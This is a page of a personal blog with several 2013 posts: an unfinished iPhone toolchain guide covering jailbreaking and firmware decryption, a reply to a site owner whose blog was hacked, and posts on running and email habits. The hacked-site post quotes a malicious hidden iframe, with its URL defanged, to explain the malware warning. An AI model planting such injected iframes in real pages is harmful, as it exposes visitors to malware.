Hack your iPhone: install a toolchain

by on May 12, 2013

in iPhone,Weblog/blog

This “hairball” post is ancient and unfinished. Would anyone care about this now? Probably not. Maybe some future data archaeologist will care.

In my previous post I covered what a toolchain is and why you need one to cross-compile applications for the iPhone.

I’ve seen rumors that there will be a Windows toolchain soon, and in theory you can create an iPhone toolchain on older Apple computer with PowerPC chips, but most of the iPhone development these days seems to favor the newer Intel-based Apple computers.

One of the best resources for all iPhone related info is the iPhone dev wiki at http://iphone.fiveforty.net/wiki/index.php/Main_Page (unlinked because the wiki maintainers aren’t sure that they can handle lots of visitors and request that people not link directly). The toolchain page at http://iphone.fiveforty.net/wiki/index.php?title=Toolchain_Project has a lot of details, and the talk page (look for the link labeled “discussion”) gives even more background. But those pages are really terse.

Here’s a little more background info, and I’ll include some additional links at the end.

Getting gcc

Did you know that recent Apple computers (and even the iPhone) ships with a solid UNIX-based kernel? You might have heard that. Something I didn’t know is that Apple computers don’t ship with a compiler such as gcc pre-installed. It should be on the DVD that came with your computer; Apple calls its developer tools Xcode, and Xcode includes gcc.

You can also download Xcode/gcc from the web. Visit http://connect.apple.com/ and sign up for a (free) developer account. After you sign up, the “Downloads” link will become clickable. Click that, then click the “Developer Tools” link. I downloaded Xcode 2.4.1, although there is a beta of Xcode 2.5 available as of today. The download is a DMG file, which stands for “Disk Image.” Double-clicking on the .dmg file will mount the disk image and open a file folder that includes the file “XcodeTools.mpkg” and if you double-click on that package, you’ll get a window that guides you through the installation of Xcode Tools. When you’re done, you can type “which gcc” in a Terminal window and you’ll see that gcc is installed.

Downloading toolchain code

Are you tired yet? Then you might want to take a break, because things are just getting started. For example, the first thing you’ll read on the wiki toolchain page is:

To use the new toolchain, check out the latest branch (as of this writing, 0.20):

svn checkout svn://svn.berlios.de/iphone-binutils/branches/alpha/0.20/

And you might be thinking “What the heck is svn?” It’s a program called Subversion, and it lets you check out source code across the web. Here’s a page about how to install Subversion on a Mac. The short answer is that there’s a couple ways. First, you can install a program called Fink that in turn helps you install more UNIX-related programs such as Subversion. Or you can download a Disk Image file, click the .dmg file, and install svn directly.

Getting Libstreams

The next thing to do on the iPhone dev wiki page says

Download libstreams from Apple’s web site, compile it, and install it.

And I’m thinking “Could they get any more terse?” Plus the dev wiki is locked down to prevent wiki vandalism, so only a few people can edit that wiki. Thanks a lot, wiki spammers, you jerks. Now everybody has to interpret terse instructions on their own and can’t update the wiki with more detailed instructions.

To get/install Libstreams, it looks like you can fetch the correct source (PowerPC/PPC or Intel/x86) from
http://publicsource.apple.com/darwinsource/10.4.9.x86/Libstreams-24.1/ or
http://publicsource.apple.com/darwinsource/10.4.9.ppc/Libstreams-24.1/

You’ll have to log in with an Apple ID. Once you log in, you see about 20 files. Download each one in turn into a single directory, and make sure that you save the files as raw files, not html. Do that by mousing over a file, doing a control-click on the filename, select “Save Link As…” and make sure to change the “Format:” drop-down selector from “HyperText” to “All Files.”

Once you have all the libstreams files in one directory, open a Terminal window, cd into that directory, and type “make” to make the libstreams.a library. Then type “sudo make install” to install the library into the right location on your Apple computer.

Are you still with me? Because we’re really just getting started. Next the wiki says

Get a copy of the iPhone system software, and set the environment variable HEAVENLY to its location (export HEAVENLY=/path/to/iphone/software).

Unless you’re a real geek, you’re probably thinking “What the @#$% does that even mean?” Well, review my toolchain and cross-compiling post. In order to build a proper toolchain, we need some of the software that is only found on the iPhone (header files? libraries? I’m not 100% sure). Since we’re cross-compiling on (say) an Apple computer, that means that we need iPhone software on our Apple desktop machine. That’s a little bit of a problem. In theory, you could copy your iPhone’s filesystem to your computer. There’s even a program called Toolchain Helper mentioned at http://iphone.fiveforty.net/wiki/index.php/Toolchain_Helper that does that. But Toolchain Helper doesn’t run on a pristine iPhone; you need to “jailbreak” your iPhone first. You can also run AppTapp/Installer.app to let you install the Toolchain Helper.

There is another way to get the iPhone software onto your computer. Apple provides the disk image (DMG) file for iPhone software. Woohoo! Except that it’s encrypted. Bleah. But someone figured out how to decrypt the software! Woohoo! Except that some people worry that decrypting the software might be a violation of the Digital Millennium Copyright Act (DMCA). Bleah. But lots of people believe that reverse-engineering software for the purposes of interoperability is legal! Woohoo! And the DMCA contains an explicit exemption for unlocking cell phones in some circumstances. Woohoo! If you’re at all nervous about decrypting a DMG file, then don’t. Consult with your local lawyer to see what your comfort level is.

The best instructions I’ve seen to extract the iPhone DMG contents are Landon Fuller’s post. He has a link to some modified source code to a program called vfdecrypt, but for some reason when I compiled vfdecrypt it wouldn’t work for me on the DMG file. There’s a precompiled vfdecrypt file to be found at http://ellkro.jot.com/HowToBuildObjCApps inside of the phonedmg12.tar.gz file on that page.

And that, sadly, is as far as I’ve gotten so far. I haven’t managed to compile a working toolchain myself yet. I’m using an older PowerPC Mac, and trying to compile things caused errors for me. I enjoyed playing around with toolchains for a day, but I don’t have much more time to invest in this. It’s clear that building a toolchain is still not for the weak of heart. On the bright side, once you have a working toolchain, it looks like there are a ton of cool applications you could write.

{ 0 comments }

My blog needs to cough up a hairball

by on May 12, 2013

in Weblog/blog

My blog is almost eight years old, and I’ve published just under a thousand blog posts in that time. Along the way, I wrote about 100 draft notes that I never published. Sometimes I just didn’t finish the posts. Sometimes I thought they were too boring. Sometimes I wrote a blog post to debunk a misconception, then decided it wasn’t worth tackling that specific topic. A few times, I wrote something snarky about another company and then thought better before hitting submit. And a lot of posts were more like notes I kept as I customized some piece of software.

All those draft blog posts were starting to bug me, so I decided to do some spring cleaning this weekend. A lot of the draft posts I just deleted. I transferred some stuff into personal Google Drive files. I was left with a dozen or so blog posts that mostly fit into the “very boring” and/or “half-finished” category. But I kept thinking that 1-2 people out of the two billion or so people online might actually run across a post and find it helpful.

So I’m going to just throw a few of semi-boring, semi-finished posts onto my blog. Feel free to ignore these.

{ 4 comments }

Malware warning

by on May 3, 2013

in Google/SEO

Recently someone on twitter complained that Chrome was labeling their site as malware:

http://Dvorak.org site blocked by Chrome browser after I wrote negative commentary about Google.

I took a few minutes to compose a reply, so I’ll go ahead and post it here:

Just to summarize: Chrome’s warning is correct. Your blog is hacked and injecting a malicious iframe on dvorak.org/blog/ even on error pages.

At the top of the page, the malicious iframe looks like this: <style>.rrfhezo { position:absolute; left:-1012px; top:-681px; }</style> <div class=”rrfhezo”><iframe src=”hxxp://cnsycrdv.organiccrap.com/jquery/get.php?ver=jquery.latest.js” width=”420″ height=”475″></iframe>

I would recommend taking your blog down until you can fix the hack and remove the malware. If you verify dvorak.org at http://google.com/webmasters/ then we’ll show you the details we know about the malicious code.

We’re just the messenger here–this definitely had nothing to do with anything you wrote about Google. In fact, we recently published a website to help site owners recover from a hacked site: http://www.google.com/webmasters/hacked/

Getting hacked truly sucks though. I hope you’re able to get things cleaned up and in good shape. When you think the site is clean, you can file an appeal at http://google.com/webmasters for your hacked site and we’ll rescan it for malware. When it’s clean, we’ll remove the warning in Chrome.

Hope that helps,
Matt Cutts

I hope no one reading this ever gets hacked, but the truth is that some people will. You can reduce the odds of getting hacked by keeping all of your web server software up to date. If you do get hacked, our site at http://www.google.com/webmasters/hacked/ will walk you through the process of cleaning up your site. I know that some site owners are annoyed when Google flags their site as hacked or serving malware, but we’re trying to protect our users as best we can.

{ 14 comments }

A big challenge: running a 50 mile race

by on April 1, 2013

in Fun

You may have heard of my 30 day challenges, where I try something new for 30 days. Those challenges are great to try out a new habit and see how you like it.

But I’m also a big believer in picking out really big goals too. In 2010 I trained for a few months so I could climb Kilimanjaro, for example. For 2011, I went skydiving and ran my first marathon in San Francisco. 2012 ended up being a blur: lots of work, plus trips and time with family. I still managed to run a couple more marathons and finish a Tough Mudder race back in Kentucky.

Which brings me to my big goal for 2013. On April 6th, 2013, I’m going to try to run 50 miles for the American River 50. It’s an ultramarathon from Sacramento to Auburn with flat ground for the first half and single-track dirt trails on the second half. The cutoff limit for finishing is 13 hours. As a running friend put it, “You really just need to make the 32 mile cutoff in 7.5 hours or so; after that you could walk the rest of the way!”

In theory, if you run the American River 50 in 11 hours then you can qualify for the Western States 100-Mile Endurance Run. But I’ve gotten a chance to run the trail half of the course a couple times now, and I don’t think there’s any way I can finish that fast. So I’m just shooting to finish in 13 hours. By the way, if you’re interested in ultramarathons (any race longer than a marathon) or trail running, there’s a great documentary about the 2010 Western States race called Unbreakable.

So that’s what I’ll be doing this weekend. Wish me luck, and if anyone want to suggest running music, please leave a comment pointing to a good YouTube video for running. Thanks!

{ 28 comments }

What I learned from time away from the internet and email

by on February 1, 2013

in 30 days

Hey folks, I just finished January’s 30 day challenge: no news, no Twitter, fewer emails, and no social media in general. For February, my wife and I are trying a gluten-free, wheat-free month to see what that’s like.

Okay, so how was January? I started with a week completely off the internet, which coincided with a reading vacation. The fact is that I *love* to read. I averaged about a book a day for a week.

In general, when I wanted to hop onto Techmeme or Google News or Hacker News or Twitter/Nuzzel, instead I opened up my to-do list. As a result, I got a ton of stuff done in January. I quickly learned that if something important was happening, I’d hear about it from someone else.

The month off also gave me a chance to think about email dysfunction. I try hard to filter my inbox aggressively: I auto-archive almost all mailing lists, I don’t sign up for newsletters, and I filter out notifications from web services. Despite that, here’s what my inbox looked like when I got back:

- 258 email threads in my inbox (I had 20 when I left). It was a quiet week: the first week in January.
- 153 threads were non-Google email threads
- only 14 threads directly involved members of my team
- 8 threads that involved my manager or someone up my reporting chain
- 6 threads involving PR or legal in some way

As you can see, a huge issue for me is email threads that originate from outside Google–that’s over half the email threads in my inbox! I’m going to keep ramping down on responding to external emails, because replying to a private communication might help that person, but in the same amount of time I could make a webmaster video or write something more general that would help a lot more people. In lots of ways, email just isn’t scalable.

Added: Someone asked how I stay in touch enough to know what topics people care about if I’m not answering email. Sorry if I didn’t explain that clearly. I still see what people are discussing on SEO blogs and on the Google webmaster forum. I know the most recent trends in how blackhats try to spam Google–that’s my primary job, after all. I look through the questions and comments that people send me on Twitter. When I put out a call for webmaster video questions, I use Google Moderator so people can vote up questions that interest them. I keep an eye on what flavors of spam snake oil are being marketing to newbies on various forums (“I know Google pulled apart my last link network, but now try my Social Rank Tout Suite product! It will automate 100% of all of your link building!”). And lots of people at Google keep an eye open themselves and alert me if they see issues. So I feel like I have a pretty good feel for the pulse of what people are talking about; it’s just that I lack the time to have one-on-one conversations with every person that emails me.

Going away for a week is also a great way to spot emails you should have filtered but didn’t. For example, I had 8 automatic emails alerting me to various people taking vacation. People work hard at Google; I usually don’t need to know if you’re taking a day or two off. I found 4 other mailing lists I could auto-archive or unsubscribe to. In general, taking some time off provides a useful perspective on what’s waiting for you when you get back.

Is anyone else doing a 30 day challenge? What are you tackling?

{ 39 comments }

← Previous Entries

Next Entries →